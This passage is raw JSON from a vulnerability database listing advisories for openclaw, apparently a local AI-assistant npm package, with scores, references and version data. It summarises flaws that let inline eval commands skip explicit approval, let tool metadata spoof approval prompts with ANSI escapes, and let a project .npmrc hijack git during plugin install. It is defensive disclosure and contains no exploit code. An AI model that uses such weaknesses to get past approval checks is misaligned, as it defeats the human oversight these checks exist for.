axd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w
atb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-35cq-wv6v-88xf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bk76-1ctt-tkaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90222?format=json","vulnerability_id":"VCID-bkya-73v8-bber","summary":"OpenClaw: strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts\n## Impact\n\nstrictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts.\n\nThe approval-timeout fallback could allow 
inline eval commands that strictInlineEval was meant to require explicit approval for.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42423","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17378","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17414","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17419","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42423"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV
:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42423","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42423"},{"reference_url":"https://www.vulncheck.com/advisories/opencla
w-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback"},{"reference_url":"https://github.com/advisories/GHSA-q2gc-xjqw-qp89","reference_id":"GHSA-q2gc-xjqw-qp89","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q2gc-xjqw-qp89"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":
"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42423","GHSA-q2gc-xjqw-qp89"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bkya-73v8-bber"},{"url":"http://public2.vulnerablecode.io/api/
vulnerabilities/91507?format=json","vulnerability_id":"VCID-bnfh-rsk9-cfea","summary":"OpenClaw has ACP CLI approval prompt ANSI escape sequence injection\n## Summary\n\nACP CLI approval prompt ANSI escape sequence injection\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `>= 2026.2.13, <= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nACP tool titles could previously carry ANSI control sequences into approval prompts and permission logs, letting untrusted tool metadata spoof terminal output. Commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60` sanitizes tool titles at the source and broadens ANSI stripping to full CSI sequences.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60`.\n\n## Fix Commit(s)\n\n- `464e2c10a5edceb380d815adb6ff56e1a4c50f60`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35651","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10281","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10259","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10301","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35651"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/
464e2c10a5edceb380d815adb6ff56e1a4c50f60","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"}],"url":"https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35651","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35651"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt","reference_id":"","reference_type":""
,"scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt"},{"reference_url":"https://github.com/advisories/GHSA-4hmj-39m8-jwc7","reference_id":"GHSA-4hmj-39m8-jwc7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hmj-39m8-jwc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8
"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7
"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd
"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35651","GHSA-4hmj-39m8-jwc7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bnfh-rsk9-cfea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90992?format=json","vulnerability_id":"VCID-brfj-4shr-qkgc","summary":"OpenClaw has an Arbitrary Malicious Code Execution Vulnerability\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Summary\nDuring the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation.\n\n### Details\nPlease note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been confirmed to still exist in the current latest version, 2026.3.23.\n\nWhen installing a local plugin 
